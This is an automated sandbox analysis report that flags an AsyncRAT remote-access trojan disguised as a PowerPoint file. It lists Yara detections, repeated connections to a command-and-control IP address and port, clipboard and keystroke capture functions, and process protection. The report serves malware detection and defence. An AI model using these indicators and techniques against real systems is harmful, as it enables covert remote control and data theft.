          Source: Yara matchFile source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, type: UNPACKEDPE
          Source: global trafficTCP traffic: 192.168.2.4:49737 -> 195.26.255.81:2106
          Source: Joe Sandbox ViewASN Name: KCOM-SPNService-ProviderNetworkex-MistralGB KCOM-SPNService-ProviderNetworkex-MistralGB
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0076D7A1 InternetReadFile,SetEvent,GetLastError,SetEvent,6_2_0076D7A1
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1828917683.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1828917683.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1828917683.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1828917683.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1828917683.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
          Source: RegSvcs.exe, 0000000C.00000002.4091230797.000000000188B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
          Source: RegSvcs.exe, 0000000C.00000002.4091230797.000000000188B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab%6f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1828917683.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1828917683.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1828917683.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1828917683.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
          Source: cipkucw.ppt.exe, 00000011.00000003.2160334326.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2160509508.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2139352487.0000000000D86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microO
          Source: RegSvcs.exe, 0000000C.00000002.4092763243.0000000003721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1828917683.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1828917683.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000000.1778450819.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000002.2022650449.0000000001095000.00000002.00000001.01000000.0000000E.sdmp, cipkucw.ppt.exe, 00000011.00000002.2169095460.0000000001095000.00000002.00000001.01000000.0000000E.sdmp, cipkucw.ppt.exe, 00000013.00000000.2151242199.0000000001095000.00000002.00000001.01000000.0000000E.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1828917683.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.drString found in binary or memory: https://www.autoitscript.com/autoit3/
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1828917683.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.drString found in binary or memory: https://www.globalsign.com/repository/0

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Yara detected AsyncRAT
          Source: Yara matchFile source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.RegSvcs.exe.760000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000003.2138978432.0000000003626000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.2001032731.000000000173E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.2000519761.000000000174E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.4092763243.0000000003721000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1874054223.000000000361A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.2219656121.0000000001845000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.2000805264.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1873750371.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.2000748696.000000000174E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1873380040.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.2048370610.0000000000762000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000003.2139352487.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.2219758241.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.2218782677.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000003.2138543622.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.2219549632.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000003.2138854777.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1874482943.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.2001114393.0000000001628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.2219993576.0000000001854000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: cipkucw.ppt PID: 1420, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2800, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: cipkucw.ppt.exe PID: 3484, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2368, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: cipkucw.ppt.exe PID: 3732, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: cipkucw.ppt.exe PID: 5780, type: MEMORYSTR
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0076F45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,6_2_0076F45C
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0076F6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_0076F6C7
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_0103F6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,15_2_0103F6C7
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0076F45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,6_2_0076F45C
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0075A54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,6_2_0075A54A
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_00789ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,6_2_00789ED5
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_01059ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,15_2_01059ED5

          Operating System Destruction

          barindex
          Protects its processes via BreakOnTermination flag
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: 01 00 00 00 Jump to behavior

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
          Source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
          Source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 16.2.RegSvcs.exe.760000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 16.2.RegSvcs.exe.760000.0.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
          Source: 16.2.RegSvcs.exe.760000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
          Source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
          Source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
          Source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
          Source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
          Source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
          Source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000011.00000003.2138978432.0000000003626000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 00000011.00000003.2138978432.0000000003626000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 0000000F.00000003.2001032731.000000000173E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 0000000F.00000003.2001032731.000000000173E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 0000000F.00000003.2000519761.000000000174E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 0000000F.00000003.2000519761.000000000174E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000006.00000003.1874054223.000000000361A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 00000006.00000003.1874054223.000000000361A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000013.00000003.2219656121.0000000001845000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 00000013.00000003.2219656121.0000000001845000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 0000000F.00000003.2000805264.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 0000000F.00000003.2000805264.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000006.00000003.1873750371.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 0000000F.00000003.2000748696.000000000174E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
